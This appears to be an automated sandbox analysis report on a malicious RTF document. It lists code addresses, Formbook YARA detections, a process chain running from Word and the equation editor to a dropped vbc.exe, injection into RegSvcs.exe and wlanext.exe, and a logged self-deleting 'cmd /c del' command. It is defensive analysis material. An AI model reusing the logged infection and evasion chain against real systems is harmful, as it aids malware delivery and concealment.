Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 6_2_00409E3C 6_2_00409E3C
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 6_2_0041D686 6_2_0041D686
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 6_2_0041DF72 6_2_0041DF72
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 6_2_0041E7CC 6_2_0041E7CC
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 6_2_00402FB0 6_2_00402FB0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 6_2_008CE0C6 6_2_008CE0C6
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 6_2_008FD005 6_2_008FD005
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 6_2_008D3040 6_2_008D3040
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 6_2_008E905A 6_2_008E905A
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 6_2_0094D06D 6_2_0094D06D
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 6_2_0095D13F 6_2_0095D13F
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 6_2_008CE2E9 6_2_008CE2E9
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 6_2_00971238 6_2_00971238
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 6_2_009763BF 6_2_009763BF
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 6_2_008CF3CF 6_2_008CF3CF
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 6_2_008F63DB 6_2_008F63DB
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 6_2_008D2305 6_2_008D2305
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 6_2_008D7353 6_2_008D7353
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 6_2_0091A37B 6_2_0091A37B
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 6_2_008E1489 6_2_008E1489
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 6_2_00905485 6_2_00905485
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 6_2_0095443E 6_2_0095443E
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 6_2_0090D47D 6_2_0090D47D
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 6_2_009735DA 6_2_009735DA
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 6_2_009505E3 6_2_009505E3
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 6_2_008EC5F0 6_2_008EC5F0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 6_2_008D351F 6_2_008D351F
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 6_2_00916540 6_2_00916540
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 6_2_008D4680 6_2_008D4680
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 6_2_008DE6C1 6_2_008DE6C1
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 6_2_0091A634 6_2_0091A634
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 6_2_00972622 6_2_00972622
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 6_2_0095579A 6_2_0095579A
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 6_2_008DC7BC 6_2_008DC7BC
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 6_2_009057C3 6_2_009057C3
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 6_2_0096771D 6_2_0096771D
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 6_2_0094F8C4 6_2_0094F8C4
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 6_2_0096F8EE 6_2_0096F8EE
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 6_2_008DC85C 6_2_008DC85C
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 6_2_008F286D 6_2_008F286D
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 6_2_0097098E 6_2_0097098E
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 6_2_008D29B2 6_2_008D29B2
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 6_2_009649F5 6_2_009649F5
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 6_2_008E69FE 6_2_008E69FE
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 6_2_00955955 6_2_00955955
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 6_2_0095394B 6_2_0095394B
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 6_2_00983A83 6_2_00983A83
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 6_2_0097CBA4 6_2_0097CBA4
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 6_2_0095DBDA 6_2_0095DBDA
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 6_2_008CFBD7 6_2_008CFBD7
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 6_2_00956BCB 6_2_00956BCB
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 6_2_008F7B00 6_2_008F7B00
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 6_2_00972C9C 6_2_00972C9C
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 6_2_0095AC5E 6_2_0095AC5E
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 6_2_0096FDDD 6_2_0096FDDD
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 6_2_00900D3B 6_2_00900D3B
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 6_2_008DCD5B 6_2_008DCD5B
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 6_2_00902E2F 6_2_00902E2F
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 6_2_008EEE4C 6_2_008EEE4C
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 6_2_0096CFB1 6_2_0096CFB1
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 6_2_00942FDC 6_2_00942FDC
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 6_2_0095BF14 6_2_0095BF14
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 6_2_008E0F3F 6_2_008E0F3F
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 6_2_008FDF7C 6_2_008FDF7C
Source: C:\Windows\SysWOW64\wlanext.exe Code function: 9_2_02021238 9_2_02021238
Source: C:\Windows\SysWOW64\wlanext.exe Code function: 9_2_01F7E0C6 9_2_01F7E0C6
Source: C:\Windows\SysWOW64\wlanext.exe Code function: 9_2_01F9905A 9_2_01F9905A
Source: C:\Windows\SysWOW64\wlanext.exe Code function: 9_2_01F83040 9_2_01F83040
Source: C:\Windows\SysWOW64\wlanext.exe Code function: 9_2_020263BF 9_2_020263BF
Source: C:\Windows\SysWOW64\wlanext.exe Code function: 9_2_01FAD005 9_2_01FAD005
Source: C:\Windows\SysWOW64\wlanext.exe Code function: 9_2_01FA63DB 9_2_01FA63DB
Source: C:\Windows\SysWOW64\wlanext.exe Code function: 9_2_01F7F3CF 9_2_01F7F3CF
Source: C:\Windows\SysWOW64\wlanext.exe Code function: 9_2_01FCA37B 9_2_01FCA37B
Source: C:\Windows\SysWOW64\wlanext.exe Code function: 9_2_01F87353 9_2_01F87353
Source: C:\Windows\SysWOW64\wlanext.exe Code function: 9_2_01F82305 9_2_01F82305
Source: C:\Windows\SysWOW64\wlanext.exe Code function: 9_2_01F7E2E9 9_2_01F7E2E9
Source: C:\Windows\SysWOW64\wlanext.exe Code function: 9_2_01F9C5F0 9_2_01F9C5F0
Source: C:\Windows\SysWOW64\wlanext.exe Code function: 9_2_02022622 9_2_02022622
Source: C:\Windows\SysWOW64\wlanext.exe Code function: 9_2_01FC6540 9_2_01FC6540
Source: C:\Windows\SysWOW64\wlanext.exe Code function: 9_2_01F8351F 9_2_01F8351F
Source: C:\Windows\SysWOW64\wlanext.exe Code function: 9_2_01F91489 9_2_01F91489
Source: C:\Windows\SysWOW64\wlanext.exe Code function: 9_2_01FB5485 9_2_01FB5485
Source: C:\Windows\SysWOW64\wlanext.exe Code function: 9_2_01FBD47D 9_2_01FBD47D
Source: C:\Windows\SysWOW64\wlanext.exe Code function: 9_2_0200579A 9_2_0200579A
Source: C:\Windows\SysWOW64\wlanext.exe Code function: 9_2_01FB57C3 9_2_01FB57C3
Source: C:\Windows\SysWOW64\wlanext.exe Code function: 9_2_0200443E 9_2_0200443E
Source: C:\Windows\SysWOW64\wlanext.exe Code function: 9_2_01F8C7BC 9_2_01F8C7BC
Source: C:\Windows\SysWOW64\wlanext.exe Code function: 9_2_01F8E6C1 9_2_01F8E6C1
Source: C:\Windows\SysWOW64\wlanext.exe Code function: 9_2_01F84680 9_2_01F84680
Source: C:\Windows\SysWOW64\wlanext.exe Code function: 9_2_01FCA634 9_2_01FCA634
Source: C:\Windows\SysWOW64\wlanext.exe Code function: 9_2_01F969FE 9_2_01F969FE
Source: C:\Windows\SysWOW64\wlanext.exe Code function: 9_2_01F829B2 9_2_01F829B2
Source: C:\Windows\SysWOW64\wlanext.exe Code function: 9_2_02033A83 9_2_02033A83
Source: C:\Windows\SysWOW64\wlanext.exe Code function: 9_2_01FA286D 9_2_01FA286D
Source: C:\Windows\SysWOW64\wlanext.exe Code function: 9_2_01F8C85C 9_2_01F8C85C
Source: C:\Windows\SysWOW64\wlanext.exe Code function: 9_2_0202CBA4 9_2_0202CBA4
Source: C:\Windows\SysWOW64\wlanext.exe Code function: 9_2_0200DBDA 9_2_0200DBDA
Source: C:\Windows\SysWOW64\wlanext.exe Code function: 9_2_01F7FBD7 9_2_01F7FBD7
Source: C:\Windows\SysWOW64\wlanext.exe Code function: 9_2_0201F8EE 9_2_0201F8EE
Source: C:\Windows\SysWOW64\wlanext.exe Code function: 9_2_01FA7B00 9_2_01FA7B00
Source: C:\Windows\SysWOW64\wlanext.exe Code function: 9_2_0200394B 9_2_0200394B
Source: C:\Windows\SysWOW64\wlanext.exe Code function: 9_2_02005955 9_2_02005955
Source: C:\Windows\SysWOW64\wlanext.exe Code function: 9_2_0202098E 9_2_0202098E
Source: C:\Windows\SysWOW64\wlanext.exe Code function: 9_2_01F8CD5B 9_2_01F8CD5B
Source: C:\Windows\SysWOW64\wlanext.exe Code function: 9_2_01FB0D3B 9_2_01FB0D3B
Source: C:\Windows\SysWOW64\wlanext.exe Code function: 9_2_0201CFB1 9_2_0201CFB1
Source: C:\Windows\SysWOW64\wlanext.exe Code function: 9_2_01FF2FDC 9_2_01FF2FDC
Source: C:\Windows\SysWOW64\wlanext.exe Code function: 9_2_01FADF7C 9_2_01FADF7C
Source: C:\Windows\SysWOW64\wlanext.exe Code function: 9_2_01F90F3F 9_2_01F90F3F
Source: C:\Windows\SysWOW64\wlanext.exe Code function: 9_2_01F9EE4C 9_2_01F9EE4C
Source: C:\Windows\SysWOW64\wlanext.exe Code function: 9_2_01FB2E2F 9_2_01FB2E2F
Source: C:\Windows\SysWOW64\wlanext.exe Code function: 9_2_0201FDDD 9_2_0201FDDD
Source: C:\Windows\SysWOW64\wlanext.exe Code function: 9_2_0009D160 9_2_0009D160
Source: C:\Windows\SysWOW64\wlanext.exe Code function: 9_2_00082D90 9_2_00082D90
Source: C:\Windows\SysWOW64\wlanext.exe Code function: 9_2_00089E3C 9_2_00089E3C
Source: C:\Windows\SysWOW64\wlanext.exe Code function: 9_2_00089E40 9_2_00089E40
Source: C:\Windows\SysWOW64\wlanext.exe Code function: 9_2_0009DF72 9_2_0009DF72
Source: C:\Windows\SysWOW64\wlanext.exe Code function: 9_2_00082FB0 9_2_00082FB0
Found potential string decryption / allocating functions
Source: C:\Windows\SysWOW64\wlanext.exe Code function: String function: 01F7E2A8 appears 38 times
Source: C:\Windows\SysWOW64\wlanext.exe Code function: String function: 01F7DF5C appears 119 times
Source: C:\Windows\SysWOW64\wlanext.exe Code function: String function: 01FC3F92 appears 132 times
Source: C:\Windows\SysWOW64\wlanext.exe Code function: String function: 01FC373B appears 244 times
Source: C:\Windows\SysWOW64\wlanext.exe Code function: String function: 01FEF970 appears 84 times
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: String function: 008CE2A8 appears 60 times
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: String function: 0093F970 appears 84 times
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: String function: 00913F92 appears 132 times
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: String function: 0091373B appears 253 times
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: String function: 008CDF5C appears 130 times
Yara signature match
Source: 00000006.00000002.2151576407.0000000000480000.00000040.00000001.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000006.00000002.2151576407.0000000000480000.00000040.00000001.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000004.00000002.2105696837.0000000003179000.00000004.00000001.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000004.00000002.2105696837.0000000003179000.00000004.00000001.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000009.00000002.2400841842.00000000001E0000.00000040.00000001.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000009.00000002.2400841842.00000000001E0000.00000040.00000001.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000006.00000002.2151416810.0000000000150000.00000040.00000001.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000006.00000002.2151416810.0000000000150000.00000040.00000001.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000009.00000002.2400878730.0000000000210000.00000004.00000001.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000009.00000002.2400878730.0000000000210000.00000004.00000001.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000009.00000002.2400699313.0000000000080000.00000040.00000001.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000009.00000002.2400699313.0000000000080000.00000040.00000001.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000006.00000002.2151530848.0000000000400000.00000040.00000001.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000006.00000002.2151530848.0000000000400000.00000040.00000001.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 6.2.RegSvcs.exe.400000.1.raw.unpack, type: UNPACKEDPE Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 6.2.RegSvcs.exe.400000.1.raw.unpack, type: UNPACKEDPE Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 6.2.RegSvcs.exe.400000.1.unpack, type: UNPACKEDPE Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 6.2.RegSvcs.exe.400000.1.unpack, type: UNPACKEDPE Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: pp[1].exe.2.dr Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
Source: vbc.exe.2.dr Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
Source: explorer.exe, 00000007.00000000.2112943695.0000000003C40000.00000002.00000001.sdmp Binary or memory string: .VBPud<_
Source: classification engine Classification label: mal100.troj.expl.evad.winRTF@12/8@3/3
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE File created: C:\Users\user\Desktop\~$wBU8MyzT.rtf Jump to behavior
Source: C:\Users\Public\vbc.exe Mutant created: \Sessions\1\BaseNamedObjects\DGxsVlh
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE File created: C:\Users\user\AppData\Local\Temp\CVRE169.tmp Jump to behavior
Source: C:\Users\Public\vbc.exe Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\7582400666d289c016013ad0f6e0e3e6\mscorlib.ni.dll Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE File read: C:\Users\desktop.ini Jump to behavior
Source: C:\Users\Public\vbc.exe Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE File read: C:\Windows\System32\drivers\etc\hosts Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE File read: C:\Windows\System32\drivers\etc\hosts Jump to behavior
Source: C:\Windows\explorer.exe File read: C:\Windows\System32\drivers\etc\hosts Jump to behavior
Source: fqwBU8MyzT.rtf ReversingLabs: Detection: 48%
Source: unknown Process created: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE 'C:\Program Files\Microsoft Office\Office14\WINWORD.EXE' /Automation -Embedding
Source: unknown Process created: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE 'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding
Source: unknown Process created: C:\Users\Public\vbc.exe 'C:\Users\Public\vbc.exe'
Source: unknown Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
Source: unknown Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
Source: unknown Process created: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE 'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding
Source: unknown Process created: C:\Windows\SysWOW64\wlanext.exe C:\Windows\SysWOW64\wlanext.exe
Source: unknown Process created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe'
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Process created: C:\Users\Public\vbc.exe 'C:\Users\Public\vbc.exe' Jump to behavior
Source: C:\Users\Public\vbc.exe Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Jump to behavior
Source: C:\Users\Public\vbc.exe Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Jump to behavior
Source: C:\Windows\SysWOW64\wlanext.exe Process created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe' Jump to behavior
Source: Window Recorder Window detected: More than 3 window changes detected
Source: C:\Users\Public\vbc.exe File opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\Resiliency\StartupItems Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE File opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll Jump to behavior
Source: Binary string: wntdll.pdb source: RegSvcs.exe, wlanext.exe
Source: Binary string: wlanext.pdb source: RegSvcs.exe, 00000006.00000002.2151498598.00000000003E0000.00000040.00000001.sdmp
Source: Binary string: RegSvcs.pdb source: wlanext.exe, 00000009.00000002.2401023696.00000000005D6000.00000004.00000020.sdmp

Data Obfuscation:

barindex
Uses code obfuscation techniques (call, push, ret)
Source: C:\Users\Public\vbc.exe Code function: 4_2_00CB48FC push edx; retf 4_2_00CB48FD
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 6_2_00417A32 push es; iretd 6_2_00417A3B
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 6_2_0041CEB5 push eax; ret 6_2_0041CF08
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 6_2_0041CF6C push eax; ret 6_2_0041CF72
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 6_2_0041CF02 push eax; ret 6_2_0041CF08
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 6_2_0041CF0B push eax; ret 6_2_0041CF72
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 6_2_008CDFA1 push ecx; ret 6_2_008CDFB4
Source: C:\Windows\SysWOW64\wlanext.exe Code function: 9_2_01F7DFA1 push ecx; ret 9_2_01F7DFB4
Source: C:\Windows\SysWOW64\wlanext.exe Code function: 9_2_00097A32 push es; iretd 9_2_00097A3B
Source: C:\Windows\SysWOW64\wlanext.exe Code function: 9_2_0009CEB5 push eax; ret 9_2_0009CF08
Source: C:\Windows\SysWOW64\wlanext.exe Code function: 9_2_0009CF0B push eax; ret 9_2_0009CF72
Source: C:\Windows\SysWOW64\wlanext.exe Code function: 9_2_0009CF02 push eax; ret 9_2_0009CF08
Source: C:\Windows\SysWOW64\wlanext.exe Code function: 9_2_0009CF6C push eax; ret 9_2_0009CF72
Source: initial sample Static PE information: section name: .text entropy: 7.62841280925
Source: initial sample Static PE information: section name: .text entropy: 7.62841280925

Persistence and Installation Behavior:

barindex
Drops PE files
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\pp[1].exe Jump to dropped file
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE File created: C:\Users\Public\vbc.exe Jump to dropped file
Drops PE files to the user directory
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE File created: C:\Users\Public\vbc.exe Jump to dropped file

Boot Survival:

barindex
Drops PE files to the user root directory
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE File created: C:\Users\Public\vbc.exe Jump to dropped file

Hooking and other Techniques for Hiding and Protection:

barindex
Modifies the prolog of user mode functions (user mode inline hooks)
Source: explorer.exe User mode code has changed: module: USER32.dll function: PeekMessageA new code: 0x48 0x8B 0xB8 0x86 0x6E 0xE7
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
